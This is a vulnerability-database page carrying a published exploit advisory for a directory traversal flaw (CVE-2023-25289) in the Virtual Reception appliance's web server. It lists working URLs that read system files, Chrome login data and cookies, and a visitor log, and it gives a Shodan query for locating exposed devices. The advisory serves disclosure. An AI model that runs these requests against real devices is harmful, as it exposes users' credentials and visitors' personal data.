Vulners
Lucene search
Virtual Reception v1.0 - Web Server Directory Traversal
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Virtual Reception 路径遍历漏洞 | 4 May 202300:00 | – | cnnvd |
 | CVE-2023-25289 | 4 May 202300:00 | – | cve |
 | CVE-2023-25289 | 4 May 202300:00 | – | cvelist |
 | EUVD-2023-29251 | 3 Oct 202520:07 | – | euvd |
 | CVE-2023-25289 | 4 May 202321:15 | – | nvd |
 | CVE-2023-25289 | 4 May 202321:15 | – | osv |
 | Directory traversal | 4 May 202321:15 | – | prion |
 | PT-2023-20013 · Unknown · Virtualreception Digital Receptie | 4 May 202300:00 | – | ptsecurity |
 | CVE-2023-25289 | 9 Jan 202612:41 | – | redhatcve |
 | CVE-2023-25289 | 4 May 202300:00 | – | vulnrichment |
10
# Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal
# Exploit Author: Spinae
# Vendor Homepage: https://www.virtualreception.nl/
# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY
# Tested on: all
# CVE-ID: CVE-2023-25289
We discovered the web server of the Virtual Reception appliance is prone to
an unauthenticated directory traversal vulnerability. This allows an
attacker to traverse outside the server root directory by specifying files
at the end of a URL request.
This is a NUC5i5RY
http://[ip address]/c:/WINDOWS/System32/drivers/etc/hosts
http://[ip address]/C:/windows/WindowsUpdate.log
...
A user called 'receptie' exists on the Windows system:
http://[ip address]/c:/users/receptie/ntuser.dat
http://[ip address]/c:/users/receptie/ntuser.ini
http://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log
...
http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User
Data/Default/Login Data
http://[ip
address]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20State
http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User
Data/Default/Cookies
...
The appliance also keeps a log of the visitors that register at the
entrance:
http://[ip address]/visitors.csv
hash icon for shodan searches:
https://www.shodan.io/search?query=http.favicon.hash%3A656388049
No reply from the vendor (phone, email, website form submissions), first
reported in 2021.
--
DISCLAIMER: Unless indicated otherwise, the information contained in this
message is privileged and confidential, and is intended only for the use of
the addressee(s) named above and others who have been specifically
authorized to receive it. If you are not the intended recipient, you are
hereby notified that any dissemination, distribution or copying of this
message and/or attachments is strictly prohibited. The company accepts no
liability for any damage caused by any virus transmitted by this message.
Furthermore, the company does not warrant a proper and complete
transmission of this information, nor does it accept liability for any
delays. If you have received this message in error, please contact the
sender and delete the message. Thank you.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Mar 2023 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.17.5
EPSS0.15638
SSVC